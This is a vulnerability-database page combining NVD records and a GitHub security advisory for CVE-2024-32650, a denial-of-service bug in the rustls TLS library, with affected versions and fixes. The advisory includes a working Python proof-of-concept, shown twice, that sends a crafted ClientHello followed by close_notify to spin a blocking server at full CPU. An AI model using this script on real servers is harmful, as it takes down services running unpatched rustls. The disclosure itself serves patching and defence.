"https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj", "refsource": "MISC", "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" }, { "name": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d", "refsource": "MISC", "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "name": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e", "refsource": "MISC", "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "name": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e", "refsource": "MISC", "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" } ] }, "source": { "advisory": "GHSA-6g7w-8wpp-frhj", "discovery": "UNKNOWN" } }, "nvd.nist.gov": { "cve": { "descriptions": [ { "lang": "en", "value": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11." } ], "id": "CVE-2024-32650", "lastModified": "2024-04-19T16:19:49.043", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ] }, "published": "2024-04-19T16:15:10.940", "references": [ { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" }, { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" } ], "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Awaiting Analysis", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-835" } ], "source": "security-advisories@github.com", "type": "Secondary" } ] } } } }
fkie_cve-2024-32650
Vulnerability from fkie_nvd
▶ | URL | Tags | |
---|---|---|---|
security-advisories@github.com | https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d | ||
security-advisories@github.com | https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e | ||
security-advisories@github.com | https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e | ||
security-advisories@github.com | https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj | ||
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d | ||
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e | ||
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e | ||
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj |
Vendor | Product | Version |
---|
{ "cveTags": [], "descriptions": [ { "lang": "en", "value": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11." }, { "lang": "es", "value": "Rustls es una librer\u00eda TLS moderna escrita en Rust. `rustls::ConnectionCommon::complete_io` podr\u00eda caer en un bucle infinito basado en la entrada de la red. Cuando se utiliza un servidor Rustls de bloqueo, si un cliente env\u00eda un mensaje `close_notify` inmediatamente despu\u00e9s de `client_hello`, el `complete_io` del servidor entrar\u00e1 en un bucle infinito. Esta vulnerabilidad se solucion\u00f3 en 0.23.5, 0.22.4 y 0.21.11." } ], "id": "CVE-2024-32650", "lastModified": "2024-11-21T09:15:23.803", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ] }, "published": "2024-04-19T16:15:10.940", "references": [ { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" }, { "source": "security-advisories@github.com", "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" } ], "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Awaiting Analysis", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-835" } ], "source": "security-advisories@github.com", "type": "Secondary" } ] }
ghsa-6g7w-8wpp-frhj
Vulnerability from github
Summary
rustls::ConnectionCommon::complete_io
could fall into an infinite loop based on network input.
Details
Verified at 0.22
and 0.23
rustls
, but 0.21
and 0.20
release lines are also affected. tokio-rustls
and rustls-ffi
do not call complete_io
and are not affected. rustls::Stream
and rustls::StreamOwned
types use complete_io
and are affected.
When using a blocking rustls server, if a client send a close_notify
message immediately after client_hello
, the server's complete_io
will get in an infinite loop where:
eof
: falseuntil_handshaked
: trueself.is_handshaking()
: trueself.wants_write()
: falseself.wants_read()
: false
PoC
- Run simple server:
cargo run --bin simpleserver test-ca/rsa/end.fullchain test-ca/rsa/end.key
-
Run following python script ```python3 #!/usr/bin/env python3
import socket
sock = socket.socket() sock.connect(("localhost", 4443))
print("Sending client hello...")
Fake handshake data of a client hello message.
fake_handshake = """ 1603 0100 c801 0000 c403 03ec 12dd 1764 a439 fd7e 8c85 46b8 4d1e a06e b3d7 a051 f03c b817 470d 4c54 c5df 7200 001c eaea c02b c02f c02c c030 cca9 cca8 c013 c014 009c 009d 002f 0035 000a 0100 007f dada 0000 ff01 0001 0000 0000 1600 1400 0011 7777 772e 7769 6b69 7065 6469 612e 6f72 6700 1700 0000 2300 0000 0d00 1400 1204 0308 0404 0105 0308 0505 0108 0606 0102 0100 0500 0501 0000 0000 0012 0000 0010 000e 000c 0268 3208 6874 7470 2f31 2e31 7550 0000 000b 0002 0100 000a 000a 0008 1a1a 001d 0017 0018 1a1a 0001 00 """
def parse_fake_handshake(): i = 0 data = bytearray() while i < len(fake_handshake): while i < len(fake_handshake) and fake_handshake[i].isspace(): i += 1 if i >= len(fake_handshake): return data
c1 = fake_handshake[i] c2 = fake_handshake[i + 1] i += 2 data.append(int(c1, 16) * 16 + int(c2, 16)) return data
data = parse_fake_handshake()
print("Fake client hello:", data)
sock.send(data)
Send close_notify alert that we're closing the connection.
close_data = bytearray([0x15, 0x03, 0x03, 0x00, 0x02, 0x01, 0x00]) print(f"close_notify is {close_data}") sock.send(close_data) print("close_notify sent")
exit(0)
`` 4. You could observe the server process get into 100% cpu usage, and if you add logging at beginning of
rustls::conn::ConnectionCommon::complete_io`, you could see the function is spinning.
Also note that the server thread is stuck in this infinite loop even if the client closes the socket.
Impact
This is a DOS.
A multithread non-async server that uses rustls
could be attacked by getting few requests like above (each request could cause one thread to spin) and stop handling normal requests.
{ "affected": [ { "database_specific": { "last_known_affected_version_range": "\u003c= 0.23.4" }, "package": { "ecosystem": "crates.io", "name": "rustls" }, "ranges": [ { "events": [ { "introduced": "0.23.0" }, { "fixed": "0.23.5" } ], "type": "ECOSYSTEM" } ] }, { "database_specific": { "last_known_affected_version_range": "\u003c= 0.22.3" }, "package": { "ecosystem": "crates.io", "name": "rustls" }, "ranges": [ { "events": [ { "introduced": "0.22.0" }, { "fixed": "0.22.4" } ], "type": "ECOSYSTEM" } ] }, { "database_specific": { "last_known_affected_version_range": "\u003c= 0.21.10" }, "package": { "ecosystem": "crates.io", "name": "rustls" }, "ranges": [ { "events": [ { "introduced": "0.21.0" }, { "fixed": "0.21.11" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "crates.io", "name": "rustls" }, "versions": [ "0.20" ] } ], "aliases": [ "CVE-2024-32650" ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2024-04-19T19:46:57Z", "nvd_published_at": "2024-04-19T16:15:10Z", "severity": "HIGH" }, "details": "### Summary\n`rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input.\n\n### Details\n\nVerified at `0.22` and `0.23` `rustls`, but `0.21` and `0.20` release lines are also affected. `tokio-rustls` and `rustls-ffi` do not call `complete_io` and are not affected. `rustls::Stream` and `rustls::StreamOwned` types use `complete_io` and are affected.\n\nWhen using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop where:\n\n- `eof`: false\n- `until_handshaked`: true\n- `self.is_handshaking()`: true\n- `self.wants_write()`: false\n- `self.wants_read()`: false\n\n\n### PoC\n\n1. Run simple server: `cargo run --bin simpleserver test-ca/rsa/end.fullchain test-ca/rsa/end.key`\n2. Run following python script\n ```python3\n #!/usr/bin/env python3\n \n import socket\n \n sock = socket.socket()\n sock.connect((\"localhost\", 4443))\n \n print(\"Sending client hello...\")\n \n # Fake handshake data of a client hello message.\n fake_handshake = \"\"\"\n 1603 0100 c801 0000 c403 03ec 12dd\n 1764 a439 fd7e 8c85 46b8 4d1e a06e b3d7\n a051 f03c b817 470d 4c54 c5df 7200 001c\n eaea c02b c02f c02c c030 cca9 cca8 c013\n c014 009c 009d 002f 0035 000a 0100 007f\n dada 0000 ff01 0001 0000 0000 1600 1400\n 0011 7777 772e 7769 6b69 7065 6469 612e\n 6f72 6700 1700 0000 2300 0000 0d00 1400\n 1204 0308 0404 0105 0308 0505 0108 0606\n 0102 0100 0500 0501 0000 0000 0012 0000\n 0010 000e 000c 0268 3208 6874 7470 2f31\n 2e31 7550 0000 000b 0002 0100 000a 000a\n 0008 1a1a 001d 0017 0018 1a1a 0001 00\n \"\"\"\n \n \n def parse_fake_handshake():\n i = 0\n data = bytearray()\n while i \u003c len(fake_handshake):\n while i \u003c len(fake_handshake) and fake_handshake[i].isspace():\n i += 1\n if i \u003e= len(fake_handshake):\n return data\n \n c1 = fake_handshake[i]\n c2 = fake_handshake[i + 1]\n i += 2\n \n data.append(int(c1, 16) * 16 + int(c2, 16))\n return data\n \n \n data = parse_fake_handshake()\n \n print(\"Fake client hello:\", data)\n \n sock.send(data)\n \n # Send close_notify alert that we\u0027re closing the connection.\n close_data = bytearray([0x15, 0x03, 0x03, 0x00, 0x02, 0x01, 0x00])\n print(f\"close_notify is {close_data}\")\n sock.send(close_data)\n print(\"close_notify sent\")\n \n exit(0)\n ```\n4. You could observe the server process get into 100% cpu usage, and if you add logging at beginning of `rustls::conn::ConnectionCommon::complete_io`, you could see the function is spinning.\n\nAlso note that the server thread is stuck in this infinite loop even if the client closes the socket.\n\n### Impact\n\nThis is a DOS.\n\nA multithread non-async server that uses `rustls` could be attacked by getting few requests like above (each request could cause one thread to spin) and stop handling normal requests.\n", "id": "GHSA-6g7w-8wpp-frhj", "modified": "2024-05-21T17:23:33Z", "published": "2024-04-19T19:46:57Z", "references": [ { "type": "WEB", "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32650" }, { "type": "WEB", "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "type": "WEB", "url": "https://github.com/rustls/rustls/commit/5374108df698e78c3e9ef8265cac311556be24af" }, { "type": "WEB", "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "type": "WEB", "url": "https://github.com/rustls/rustls/commit/ebcb4782f23b4edf9b10a7065d9e8d4362439d9c" }, { "type": "WEB", "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" }, { "type": "PACKAGE", "url": "https://github.com/rustls/rustls" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2024-0336.html" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Denial of Service Vulnerability in Rustls Library" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.